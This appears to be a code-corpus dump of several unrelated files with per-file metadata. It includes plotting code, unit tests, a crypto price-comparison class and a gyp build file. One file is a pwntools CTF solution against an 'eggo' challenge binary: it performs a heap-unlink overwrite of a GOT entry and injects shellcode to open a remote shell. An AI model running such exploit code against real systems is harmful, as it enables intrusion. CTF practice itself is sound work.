Returns ------- matplotlib object """ # Get x and y axis limits, if user passed them if zoom is None: user_xmin = 35 user_xmax = 100 user_ymin = 0 user_ymax = 25 elif zoom == 'user_data': if isinstance(user_data, pd.DataFrame): print("'user_data' type zoom for more than one sample is not ", "implemented yet.") user_xmin = 35 user_xmax = 100 user_ymin = 0 user_ymax = 25 elif (isinstance(user_data, pd.core.series.Series) or isinstance(user_data, dict)): user_xmin = user_data['SiO2'] - 5 user_xmax = user_data['SiO2'] + 5 user_ymin = user_data['Na2O'] + user_data['K2O'] - 2 if user_ymin < 0: user_ymin = 0 user_ymax = user_data['Na2O'] + user_data['K2O'] + 2 elif isinstance(zoom, list): user_xmin, user_xmax = zoom[0] user_ymin, user_ymax = zoom[1] else: raise core.InputError('Trying to pass zoom coords? Pass as ' + '[(x, x), (y, y)]') # Create the figure fig, ax1 = plt.subplots(figsize=figsize) font = {'family': 'sans-serif', 'color': 'black', 'weight': 'normal', 'size': 20, } # TAS figure if plot_type == 'TAS': # adjust x limits here if you want to focus on a specific part of # compostional space: ax1.set_xlim([user_xmin, user_xmax]) # adjust y limits here ax1.set_ylim([user_ymin, user_ymax]) plt.xlabel('SiO$_2$, wt%', fontdict=font, labelpad=15) plt.ylabel('Na$_2$O+K$_2$O, wt%', fontdict=font, labelpad=15) # add LeMaitre fields if zoom is None: add_LeMaitre_fields(ax1) elif plot_type == 'xy': if 'x' in kwargs and 'y' in kwargs: x = kwargs['x'] y = kwargs['y'] if zoom is not None: ax1.set_xlim([user_xmin, user_xmax]) ax1.set_ylim([user_ymin, user_ymax]) plt.xlabel(str(x)+", wt%", fontdict=font, labelpad=15) plt.ylabel(str(y)+", wt%", fontdict=font, labelpad=15) else: raise core.InputError("If plot_type is 'xy', then x and y " "values must be passed as strings. 
For " "example, x='SiO2', y='Al2O3'.") # Plot Calibration Data if model == 'all': model = ['MagmaSat', 'Shishkina', 'Dixon', 'IaconoMarziano', 'Liu', 'AllisonCarbon', 'MooreWater'] if model == 'mixed': model = ['MagmaSat', 'Shishkina', 'Dixon', 'IaconoMarziano', 'Liu'] if isinstance(model, str): model = [model] if isinstance(model, list): # set legends to false h2o_legend = False co2_h2oco2_legend = False # check which legends to turn to True for modelname in model: model_type = calibrations.return_calibration_type(modelname) if model_type['H2O']: h2o_legend = True if model_type['CO2'] or model_type['Mixed']: co2_h2oco2_legend = True if h2o_legend: plt.scatter([], [], marker='', label=r"$\bf{Pure \ H_2O:}$") for modelname in model: calibdata = calibrations.return_calibration(modelname) model_type = calibrations.return_calibration_type(modelname) if isinstance(calibdata, str): w.warn(calibdata) else: if model_type['H2O']: if plot_type == 'TAS': try: plt.scatter(calibdata['H2O']['SiO2'], (calibdata['H2O']['Na2O'] + calibdata['H2O']['K2O']), marker='s', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: plt.scatter(calibdata['H2O']['SiO2'], calibdata['H2O']['Na2O+K2O'], marker='s', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) if plot_type == 'xy': try: plt.scatter(calibdata['H2O'][x], calibdata['H2O'][y], marker='s', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: w.warn("The requested oxides were not found", "in the calibration dataset for " + str(modelname) + ".") if co2_h2oco2_legend: plt.scatter([], [], marker='', label=r"${\ }$") if co2_h2oco2_legend: plt.scatter([], [], marker='', label=r"$\bf{\ CO_2 \ and \ H_2O\!-\!CO_2:}$") for modelname in model: calibdata = calibrations.return_calibration(modelname) model_type = calibrations.return_calibration_type(modelname) if isinstance(calibdata, str): w.warn(calibdata) else: if model_type['CO2'] and 
model_type['Mixed']: frames = [calibdata['CO2'], calibdata['Mixed']] co2_and_mixed = pd.concat(frames) if plot_type == 'TAS': try: plt.scatter(co2_and_mixed['SiO2'], (co2_and_mixed['Na2O'] + co2_and_mixed['K2O']), marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: plt.scatter(co2_and_mixed['SiO2'], co2_and_mixed['Na2O+K2O'], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) if plot_type == 'xy': try: plt.scatter(co2_and_mixed[x], co2_and_mixed[y], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: w.warn("The requested oxides were not found in ", "the calibration dataset for " + str(modelname) + ".") elif model_type['CO2'] or model_type['Mixed']: if model_type['CO2']: thistype = 'CO2' if model_type['Mixed']: thistype = 'Mixed' if plot_type == 'TAS': try: plt.scatter(calibdata[thistype]['SiO2'], (calibdata[thistype]['Na2O'] + calibdata[thistype]['K2O']), marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: plt.scatter(calibdata[thistype]['SiO2'], calibdata[thistype]['Na2O+K2O'], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) if plot_type == 'xy': try: plt.scatter(calibdata[thistype][x], calibdata[thistype][y], marker='d', edgecolors='k', facecolors=calibdata['facecolor'], label=str(modelname)) except Exception: w.warn("The requested oxides were not found in ", "the calibration dataset for " + str(modelname) + ".") else: raise core.InputError("model must be of type str or list") # Plot user data if user_data is None: pass else: if ((user_data.__class__.__module__, user_data.__class__.__name__) == ('VESIcal', 'BatchFile')): user_data = user_data.get_data() # batchfile and VESIcal (__init__) are not imported to avoid # circular imports # use above notation to interrogate datatype if ((user_data.__class__.__module__, user_data.__class__.__name__) 
== ('VESIcal', 'Sample')): user_data = user_data.get_composition() # batchfile and VESIcal (__init__) are not imported to avoid # circular imports # use above notation to interrogate datatype if plot_type == 'TAS': _sample = user_data.copy() try: _sample["TotalAlkalis"] = _sample["Na2O"] + _sample["K2O"] except Exception: core.InputError("Na2O and K2O data must be in user_data") plt.scatter(_sample['SiO2'], _sample['TotalAlkalis'], s=150, edgecolors='w', facecolors='red', marker='P', label='User Data') if plot_type == 'xy': _sample = user_data.copy() plt.scatter(_sample[x], _sample[y], s=150, edgecolors='w', facecolors='red', marker='P', label='User Data') if legend: plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left") fig.tight_layout() if isinstance(save_fig, str): fig.savefig(save_fig) return fig, ax1 def show(): """ Local implementation of pyplot.show(). For displaying created plots. """ plt.show()
40.100742
80
0.532276
4,458
37,815
4.373935
0.114401
0.012719
0.006923
0.013539
0.522745
0.469101
0.42915
0.376789
0.346582
0.320016
0
0.017262
0.374957
37,815
942
81
40.143312
0.807709
0.2801
0
0.467972
0
0
0.08569
0
0
0
0
0
0
1
0.014235
false
0.021352
0.014235
0
0.042705
0.003559
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c9d0224c8f3e8cd2f2000caf10456ad5cb58d3
824
py
Python
test/test_tools.py
translationalneurosurgery/tool-dimep
d2e3f8847d8a43d75b9ffc2dfaf65e5d1662c8ae
[ "MIT" ]
2
2021-11-01T11:48:59.000Z
2021-11-03T19:07:16.000Z
test/test_tools.py
agricolab/tool-dimep
d2e3f8847d8a43d75b9ffc2dfaf65e5d1662c8ae
[ "MIT" ]
2
2021-03-31T10:47:46.000Z
2021-03-31T11:31:51.000Z
test/test_tools.py
neuromti/tool-dimep
36f9f404c99a53e85c9c492c4b0a281f832e07ba
[ "MIT" ]
null
null
null
from dimep.tools import * import numpy as np import pytest @pytest.mark.parametrize("binsize", np.arange(1.0, 20.0, 1.0)) def test_downbin(binsize): x = np.arange(0.0, 100.0, 1) if binsize == 1.0: xhat = x else: xhat = np.arange((binsize - 1) / 2, 100.0 - binsize / 2, binsize) assert np.allclose(down_bin(x, int(binsize)), xhat) def test_bwboundaries(): assert np.allclose(bw_boundaries([0, 1, 1, 0]), [0, 1, 1, 0]) assert np.allclose(bw_boundaries([0, 1, 1, 0, 1]), [0, 1, 1, 0, 2]) assert np.allclose(bw_boundaries([1, 1, 1, 0, 1]), [1, 1, 1, 0, 2]) assert np.allclose(bw_boundaries([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1]) assert np.allclose(bw_boundaries([1, 1, 0, 0, 1]), [1, 1, 0, 0, 2]) assert np.allclose(bw_boundaries([1, 1, 0, 1, 0, 1]), [1, 1, 0, 2, 0, 3])
34.333333
77
0.583738
154
824
3.064935
0.214286
0.101695
0.082627
0.067797
0.476695
0.459746
0.447034
0.434322
0.366525
0.148305
0
0.127889
0.212379
824
23
78
35.826087
0.599384
0
0
0
0
0
0.008495
0
0
0
0
0
0.388889
1
0.111111
false
0
0.166667
0
0.277778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99cba028d63bd0b3002ecf1a8511685b7a12c347
6,825
py
Python
crypto_comparison.py
tomsch1/defichain-arbitrage-telegram-bot
b9f5291eaa60771c0ae28f832467393611de3da4
[ "MIT" ]
1
2022-03-01T14:19:49.000Z
2022-03-01T14:19:49.000Z
crypto_comparison.py
tomsch1/defichain-arbitrage-telegram-bot
b9f5291eaa60771c0ae28f832467393611de3da4
[ "MIT" ]
null
null
null
crypto_comparison.py
tomsch1/defichain-arbitrage-telegram-bot
b9f5291eaa60771c0ae28f832467393611de3da4
[ "MIT" ]
null
null
null
import cexdatacollect
import dfi_dex_prices
from symbols import CryptoExchangeSymbols


class SymbolPrice():
    """A single price quote for one trading pair on one exchange."""

    def __init__(self, exchange_name: str, symbol: str, price: float):
        self.exchange_name: str = exchange_name
        self.symbol: str = symbol
        self.price: float = price


class IndirectComparison():
    """Premium of the DEX DFI quote over a CEX quote, optionally routed
    through an intermediate pair (e.g. DFI/ETH priced via ETH/BTC).

    When ``percentage_minus_one`` is True, ``percentage`` holds the premium
    (price ratio minus one); otherwise it holds the raw price ratio.
    """

    def __init__(self, ex_name: str, cex_dfi_pair: SymbolPrice, dex_dfi_pair: SymbolPrice,
                 intermediate_pair: SymbolPrice = None, percentage_minus_one: bool = True):
        self.ex_name: str = ex_name
        self.dex_dfi_pair = dex_dfi_pair
        self.cex_dfi_pair = cex_dfi_pair
        self.intermediate_pair = intermediate_pair
        if intermediate_pair is None:
            perc = dex_dfi_pair.price / cex_dfi_pair.price
        else:
            # Debug trace kept from the original implementation.
            print(f"{dex_dfi_pair.symbol} = {dex_dfi_pair.price}, {intermediate_pair.symbol} = {intermediate_pair.price}, {cex_dfi_pair.symbol} = {cex_dfi_pair.price}")
            perc = dex_dfi_pair.price / (cex_dfi_pair.price / intermediate_pair.price)
        # Shared tail of both branches (was duplicated in the original).
        if percentage_minus_one:
            perc = perc - 1
        self.percentage: float = perc


class AggregatedComparison():
    """Direct CEX-vs-DEX comparison; ``percentage`` is the DEX premium."""

    def __init__(self, cex_name: str, symbol, cex_price, dex_price):
        self.cex_name: str = cex_name
        self.symbol: CryptoExchangeSymbols = symbol
        self.cex_price: float = cex_price
        self.dex_price: float = dex_price
        self.percentage: float = (dex_price / cex_price) - 1


class CryptoComparison():
    """Compares DFI prices between the DeFiChain DEX and a CEX (KuCoin)."""

    # Kept for backward compatibility with code reading the class attribute;
    # each instance now also gets its own list in __init__ so instances do
    # not share one mutable default.
    all_pairs = []

    def __init__(self, dex_data: dfi_dex_prices.DfiDexPrices, cex_data: cexdatacollect.CexPriceFetch):
        self.dex_data = dex_data
        self.cex_data = cex_data
        self.all_pairs = []

    def get_indirect_comparison(self, dfi_symbol: CryptoExchangeSymbols,
                                intermediate_symbol: CryptoExchangeSymbols = None,
                                inverse_intermediate_symbol: bool = False,
                                inverse_cex_dfi_price: bool = True) -> IndirectComparison:
        """Build an :class:`IndirectComparison` for ``dfi_symbol``.

        With no ``intermediate_symbol`` the CEX quote for ``dfi_symbol`` is
        used directly; otherwise the CEX DFI quote is derived via the
        intermediate pair. ``inverse_intermediate_symbol`` flips which side
        of the intermediate pair is treated as the DFI counter-currency.
        """
        exchange_name = 'KuCoin'
        dex_dfi_price = float(self.dex_data.dex_crypto_state_map[dfi_symbol.d_token()].data.price_ratio.ba)
        if intermediate_symbol is not None:
            base, quote = intermediate_symbol.value.split('/')
            # Invert the CEX quote so that, like the DEX quote, it is
            # expressed in DFI terms.
            intermediate_price = 1 / float(self.cex_data.cex_price_state[exchange_name][intermediate_symbol.value]['last'])
            if inverse_intermediate_symbol:
                new_cex_symbol = f"DFI/{base}"
                # BUG FIX: the original rebound the boolean parameter
                # ``inverse_intermediate_symbol`` to this string; use a
                # dedicated local instead.
                inverted_symbol = f"{quote}/{base}"
                intermediate_pair = SymbolPrice(exchange_name, inverted_symbol, intermediate_price)
            else:
                new_cex_symbol = f"DFI/{quote}"
                intermediate_pair = SymbolPrice(exchange_name, intermediate_symbol.value, intermediate_price)
            cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][new_cex_symbol]['last'])
            if inverse_cex_dfi_price:
                cex_dfi_price = 1 / cex_dfi_price
            cex_dfi_pair = SymbolPrice(exchange_name, new_cex_symbol, cex_dfi_price)
        else:
            intermediate_pair = None
            cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][dfi_symbol.value]['last'])
            if inverse_cex_dfi_price:
                cex_dfi_price = 1 / cex_dfi_price
            cex_dfi_pair = SymbolPrice(exchange_name, dfi_symbol.value, cex_dfi_price)
        return IndirectComparison(
            ex_name=exchange_name,
            cex_dfi_pair=cex_dfi_pair,
            dex_dfi_pair=SymbolPrice('dex', dfi_symbol.value, dex_dfi_price),
            intermediate_pair=intermediate_pair,
            # NOTE(review): percentage_minus_one is driven by
            # inverse_cex_dfi_price in the original code; preserved as-is,
            # but confirm the coupling is intentional.
            percentage_minus_one=inverse_cex_dfi_price
        )

    def get_all_comparisons(self) -> 'list[IndirectComparison]':
        """Return comparisons for every tracked DFI pair.

        For pairs with several possible CEX routes the route showing the
        largest absolute premium is used.  (Annotation fixed: the original
        declared ``[SymbolPrice]`` although the list holds
        :class:`IndirectComparison` objects.)
        """
        return [
            self.get_indirect_comparison(CryptoExchangeSymbols.DFIBTC, None),
            self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDT, None),
            self.get_maximum_percentage(CryptoExchangeSymbols.DFIETH, [CryptoExchangeSymbols.ETHBTC, CryptoExchangeSymbols.ETHUSDT]),
            self.get_maximum_percentage(CryptoExchangeSymbols.DFILTC, [CryptoExchangeSymbols.LTCBTC, CryptoExchangeSymbols.LTCUSDT]),
            # Something is wrong here!
            # self.get_indirect_comparison(ExchangeSymbol.DFIUSDC, ExchangeSymbol.BTCUSDC, True, False),
            self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDC, CryptoExchangeSymbols.USDTUSDC, True),
            self.get_maximum_percentage(CryptoExchangeSymbols.DFIBCH, [CryptoExchangeSymbols.BCHBTC, CryptoExchangeSymbols.BCHUSDT]),
            self.get_maximum_percentage(CryptoExchangeSymbols.DFIDOGE, [CryptoExchangeSymbols.DOGEBTC, CryptoExchangeSymbols.DOGEUSDT]),
        ]

    def get_maximum_percentage(self, dfi_symbol: CryptoExchangeSymbols,
                               intermediate_pairs: 'list[CryptoExchangeSymbols]') -> IndirectComparison:
        """Return the routed comparison with the largest absolute premium.

        ``max`` returns the first maximum, matching the original
        ``list.index``-based selection.
        """
        paths = [self.get_indirect_comparison(dfi_symbol, pair) for pair in intermediate_pairs]
        return max(paths, key=lambda path: abs(path.percentage))

    def update_pairs(self):
        """Refresh the cached comparison list from current market data."""
        self.all_pairs = self.get_all_comparisons()

    def get_overview(self):
        """Return a human-readable premium overview, sorted by |premium|."""
        pairs = self.get_all_comparisons()
        pair_text = []
        for pair in sorted(pairs, key=lambda x: abs(x.percentage), reverse=True):
            if pair.intermediate_pair is None:
                text = f"""
DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}:
DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI
{pair.ex_name}:\t{round(pair.cex_dfi_pair.price, 3)} DFI
\t{round(pair.percentage*100, 2)} %
"""
            else:
                text = f"""
DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}:
DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI
{pair.ex_name} via {pair.intermediate_pair.symbol.split('/')[1]}:\t{round(pair.cex_dfi_pair.price / pair.intermediate_pair.price, 3)} DFI
\t{round(pair.percentage * 100, 2)} %
"""
            pair_text.append(text)
        single_pair_text_string = '\n'.join(pair_text)
        return f" Current premium overview:\n{single_pair_text_string}"

    def evaluate_alarm(self, symbol_name, threshold: float):
        """Return the cached pair for ``symbol_name`` whose absolute premium
        reaches ``threshold``, or ``None`` if no pair qualifies.

        Requires :meth:`update_pairs` to have populated ``all_pairs``.
        """
        # Hoisted out of the loop: the symbol does not change per pair.
        symbol = CryptoExchangeSymbols.from_string(symbol_name)
        for pair in self.all_pairs:
            if pair.dex_dfi_pair.symbol == symbol.value and abs(pair.percentage) >= abs(threshold):
                return pair
        return None
46.114865
203
0.670183
796
6,825
5.409548
0.15201
0.048769
0.03019
0.022759
0.391779
0.217139
0.195309
0.185787
0.185787
0.142127
0
0.004784
0.234286
6,825
147
204
46.428571
0.819173
0.016703
0
0.210526
0
0.017544
0.151551
0.102625
0
0
0
0
0
1
0.087719
false
0
0.026316
0.008772
0.201754
0.008772
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99cc57d801b28345067bcc1957c433411f4b1448
3,915
py
Python
HackyEaster/he2022/level8/ch37/solve37_unlink.py
tbrup/ctf-writeups
dfac11abb3051af657ed3384c3c389c14a40c10e
[ "MIT" ]
null
null
null
HackyEaster/he2022/level8/ch37/solve37_unlink.py
tbrup/ctf-writeups
dfac11abb3051af657ed3384c3c389c14a40c10e
[ "MIT" ]
null
null
null
HackyEaster/he2022/level8/ch37/solve37_unlink.py
tbrup/ctf-writeups
dfac11abb3051af657ed3384c3c389c14a40c10e
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template --host 46.101.107.117 --port 2208 ./eggo from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('./eggo') # libc = ELF('./libc-2.33.so') # Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or '46.101.107.117' port = int(args.PORT or 2208) def start_local(argv=[], *a, **kw): '''Execute the target binary locally''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) def start_remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = connect(host, port) if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw) # Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. 
# ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals()) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x400000) EGG = 0x004040e0 io = start() # first allocate memory for egg 0,1,2 eggsize = 64 if eggsize % 8 != 0: bufsize = eggsize+8 else: bufsize = eggsize+16 io.recvuntil(b'> ') io.sendline(b'1\n%d'%eggsize) print(io.recvline()) io.sendline(b'1\n%d'%eggsize) print(io.recvline()) io.sendline(b'1\n%d'%eggsize) print(io.recvline()) # io.sendline(b'1\n24') # create shellcode, then edit egg 0 sc = asm('nop;'*16 + shellcraft.amd64.linux.sh()) payload = sc + (b'0' * (bufsize-len(sc)-16)) + p64(-8, sign = "signed") + p64(-8, sign = "signed") + p64(exe.got["strlen"]) + p64(0x4052b0) print('Address of puts: ' , hex(exe.got["puts"])) print('Address of strlen: ' , hex(exe.got["strlen"])) # print('Address of puts: ' , p32(exe.got["puts"])) # payload = cyclic(44, n=4) io.sendline(b'4\n0') #io.sendline(b'0'*(bufsize-8) + p64(0x55)) #print(io.recvline()) #io.sendline(b'4\n1') io.sendline(payload) print(io.recvline()) # io.sendline(b'3\n0') # print(io.recvline()) # io.sendline(b'3\n1') # print(io.recvline()) # io.sendline(b'4\n1') # io.sendline(b'make me crash') # print(io.recvline()) # io.sendline(b'3\n0') # print(io.recvline()) # io.sendline(b'3\n1') # print(io.recvline()) # now delete egg 0 to execute the shellcode io.sendline(b'2\n1') # shellcode = asm(shellcraft.sh()) # payload = fit({ # 32: 0xdeadbeef, # 'iaaa': [1, 2, 'Hello', 3] # }, length=128) # io.send(payload) # flag = io.recv(...) 
# log.success(flag) with open('payload', 'wb') as outF: outF.write(b'1\n%d\n1\n%d\n1\n%d\n'%(eggsize,eggsize,eggsize)) outF.write(b'4\n0\n') outF.write(b'0'*(bufsize-8) + p64(0x54) + b'\n') outF.write(b'4\n1\n') outF.write(payload) outF.write(b'\n2\n1\n') # log.info("Address of fullname: {}".format(hex(address))) # log.info("Address of win(): {}".format(hex(exe.symbols["win"]))) # log.info("shellcode:\n{}".format(hexdump(shellcode))) # payload = shellcode + ('B' * (664-len(shellcode))) + p32(100, sign = "signed") + p32(-4, sign = "signed") + p32(exe.got["puts"] - 12) + p32(address) # log.info("payload:\n{}".format(hexdump(payload))) # io.sendlineafter("Input fullname", payload) # io.sendlineafter("Input lastname", "a") #print(io.recvline()) io.interactive()
29
150
0.614304
595
3,915
4.035294
0.347899
0.062474
0.06414
0.070804
0.206581
0.137026
0.137026
0.137026
0.137026
0.137026
0
0.051415
0.160409
3,915
134
151
29.216418
0.679039
0.547382
0
0.226415
1
0
0.111307
0.012367
0
0
0.012956
0
0
1
0.056604
false
0
0.018868
0
0.169811
0.113208
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99ccf27382ed8c167f71ca16ab953e0670010da4
481
py
Python
test/TestClasse.py
AMadianov/Calc-python
449b6747d3ba6558eaf950a45aa33563aee06238
[ "MIT" ]
null
null
null
test/TestClasse.py
AMadianov/Calc-python
449b6747d3ba6558eaf950a45aa33563aee06238
[ "MIT" ]
null
null
null
test/TestClasse.py
AMadianov/Calc-python
449b6747d3ba6558eaf950a45aa33563aee06238
[ "MIT" ]
null
null
null
import unittest


class MyClass(object):
    """Only accepts ``foo == 1``; anything else raises ``ValueError``."""

    def __init__(self, foo):
        if foo != 1:
            raise ValueError("foo is not equal to 1!")


class MyClass2(object):
    """Constructor takes no arguments beyond ``self``."""

    def __init__(self):
        pass


class TestFoo(unittest.TestCase):
    """Sanity checks for the constructor validation above."""

    def testInsufficientArgs(self):
        # A non-1 value must be rejected by MyClass.__init__.
        with self.assertRaises(ValueError):
            MyClass(0)

    def testArgs(self):
        # MyClass2 accepts no positional arguments, so passing one
        # (here a tuple) must raise TypeError.
        with self.assertRaises(TypeError):
            MyClass2(("fsa", "fds"))


if __name__ == '__main__':
    unittest.main()
22.904762
62
0.632017
55
481
5.236364
0.545455
0.0625
0.090278
0.118056
0
0
0
0
0
0
0
0.01385
0.24948
481
21
63
22.904762
0.783934
0
0
0
0
0
0.074689
0
0
0
0
0
0.125
1
0.25
false
0.0625
0.0625
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
99ce937a922710b30381f8493591068886a8598c
25,467
gyp
Python
groups/bsl/bslmf/bslmf.gyp
zhanzju/bsl
1bb79982cff9bbaa3fb6d038604f04283ba76f07
[ "MIT" ]
1
2015-11-06T05:25:03.000Z
2015-11-06T05:25:03.000Z
groups/bsl/bslmf/bslmf.gyp
zhanzju/bsl
1bb79982cff9bbaa3fb6d038604f04283ba76f07
[ "MIT" ]
null
null
null
groups/bsl/bslmf/bslmf.gyp
zhanzju/bsl
1bb79982cff9bbaa3fb6d038604f04283ba76f07
[ "MIT" ]
null
null
null
{ 'variables': { 'bslmf_sources': [ 'bslmf_addconst.cpp', 'bslmf_addcv.cpp', 'bslmf_addlvaluereference.cpp', 'bslmf_addpointer.cpp', 'bslmf_addreference.cpp', 'bslmf_addrvaluereference.cpp', 'bslmf_addvolatile.cpp', 'bslmf_arraytopointer.cpp', 'bslmf_assert.cpp', 'bslmf_conditional.cpp', 'bslmf_detectnestedtrait.cpp', 'bslmf_enableif.cpp', 'bslmf_forwardingtype.cpp', 'bslmf_functionpointertraits.cpp', 'bslmf_haspointersemantics.cpp', 'bslmf_if.cpp', 'bslmf_integralconstant.cpp', 'bslmf_isarithmetic.cpp', 'bslmf_isarray.cpp', 'bslmf_isbitwiseequalitycomparable.cpp', 'bslmf_isbitwisemoveable.cpp', 'bslmf_isclass.cpp', 'bslmf_isconst.cpp', 'bslmf_isconvertible.cpp', 'bslmf_isconvertibletoany.cpp', 'bslmf_isenum.cpp', 'bslmf_isfloatingpoint.cpp', 'bslmf_isfunction.cpp', 'bslmf_isfundamental.cpp', 'bslmf_isintegral.cpp', 'bslmf_islvaluereference.cpp', 'bslmf_ismemberfunctionpointer.cpp', 'bslmf_ismemberobjectpointer.cpp', 'bslmf_ismemberpointer.cpp', 'bslmf_ispair.cpp', 'bslmf_ispointer.cpp', 'bslmf_ispointertomember.cpp', 'bslmf_ispolymorphic.cpp', 'bslmf_isreference.cpp', 'bslmf_isrvaluereference.cpp', 'bslmf_issame.cpp', 'bslmf_istriviallycopyable.cpp', 'bslmf_istriviallydefaultconstructible.cpp', 'bslmf_isvoid.cpp', 'bslmf_isvolatile.cpp', 'bslmf_matchanytype.cpp', 'bslmf_matcharithmetictype.cpp', 'bslmf_memberfunctionpointertraits.cpp', 'bslmf_metaint.cpp', 'bslmf_nestedtraitdeclaration.cpp', 'bslmf_nil.cpp', 'bslmf_removeconst.cpp', 'bslmf_removecv.cpp', 'bslmf_removecvq.cpp', 'bslmf_removepointer.cpp', 'bslmf_removereference.cpp', 'bslmf_removevolatile.cpp', 'bslmf_selecttrait.cpp', 'bslmf_switch.cpp', 'bslmf_tag.cpp', 'bslmf_typelist.cpp', ], 'bslmf_tests': [ 'bslmf_addconst.t', 'bslmf_addcv.t', 'bslmf_addlvaluereference.t', 'bslmf_addpointer.t', 'bslmf_addreference.t', 'bslmf_addrvaluereference.t', 'bslmf_addvolatile.t', 'bslmf_arraytopointer.t', 'bslmf_assert.t', 'bslmf_conditional.t', 'bslmf_detectnestedtrait.t', 'bslmf_enableif.t', 'bslmf_forwardingtype.t', 
'bslmf_functionpointertraits.t', 'bslmf_haspointersemantics.t', 'bslmf_if.t', 'bslmf_integralconstant.t', 'bslmf_isarithmetic.t', 'bslmf_isarray.t', 'bslmf_isbitwiseequalitycomparable.t', 'bslmf_isbitwisemoveable.t', 'bslmf_isclass.t', 'bslmf_isconst.t', 'bslmf_isconvertible.t', 'bslmf_isconvertibletoany.t', 'bslmf_isenum.t', 'bslmf_isfloatingpoint.t', 'bslmf_isfunction.t', 'bslmf_isfundamental.t', 'bslmf_isintegral.t', 'bslmf_islvaluereference.t', 'bslmf_ismemberfunctionpointer.t', 'bslmf_ismemberobjectpointer.t', 'bslmf_ismemberpointer.t', 'bslmf_ispair.t', 'bslmf_ispointer.t', 'bslmf_ispointertomember.t', 'bslmf_ispolymorphic.t', 'bslmf_isreference.t', 'bslmf_isrvaluereference.t', 'bslmf_issame.t', 'bslmf_istriviallycopyable.t', 'bslmf_istriviallydefaultconstructible.t', 'bslmf_isvoid.t', 'bslmf_isvolatile.t', 'bslmf_matchanytype.t', 'bslmf_matcharithmetictype.t', 'bslmf_memberfunctionpointertraits.t', 'bslmf_metaint.t', 'bslmf_nestedtraitdeclaration.t', 'bslmf_nil.t', 'bslmf_removeconst.t', 'bslmf_removecv.t', 'bslmf_removecvq.t', 'bslmf_removepointer.t', 'bslmf_removereference.t', 'bslmf_removevolatile.t', 'bslmf_selecttrait.t', 'bslmf_switch.t', 'bslmf_tag.t', 'bslmf_typelist.t', ], 'bslmf_tests_paths': [ '<(PRODUCT_DIR)/bslmf_addconst.t', '<(PRODUCT_DIR)/bslmf_addcv.t', '<(PRODUCT_DIR)/bslmf_addlvaluereference.t', '<(PRODUCT_DIR)/bslmf_addpointer.t', '<(PRODUCT_DIR)/bslmf_addreference.t', '<(PRODUCT_DIR)/bslmf_addrvaluereference.t', '<(PRODUCT_DIR)/bslmf_addvolatile.t', '<(PRODUCT_DIR)/bslmf_arraytopointer.t', '<(PRODUCT_DIR)/bslmf_assert.t', '<(PRODUCT_DIR)/bslmf_conditional.t', '<(PRODUCT_DIR)/bslmf_detectnestedtrait.t', '<(PRODUCT_DIR)/bslmf_enableif.t', '<(PRODUCT_DIR)/bslmf_forwardingtype.t', '<(PRODUCT_DIR)/bslmf_functionpointertraits.t', '<(PRODUCT_DIR)/bslmf_haspointersemantics.t', '<(PRODUCT_DIR)/bslmf_if.t', '<(PRODUCT_DIR)/bslmf_integralconstant.t', '<(PRODUCT_DIR)/bslmf_isarithmetic.t', '<(PRODUCT_DIR)/bslmf_isarray.t', 
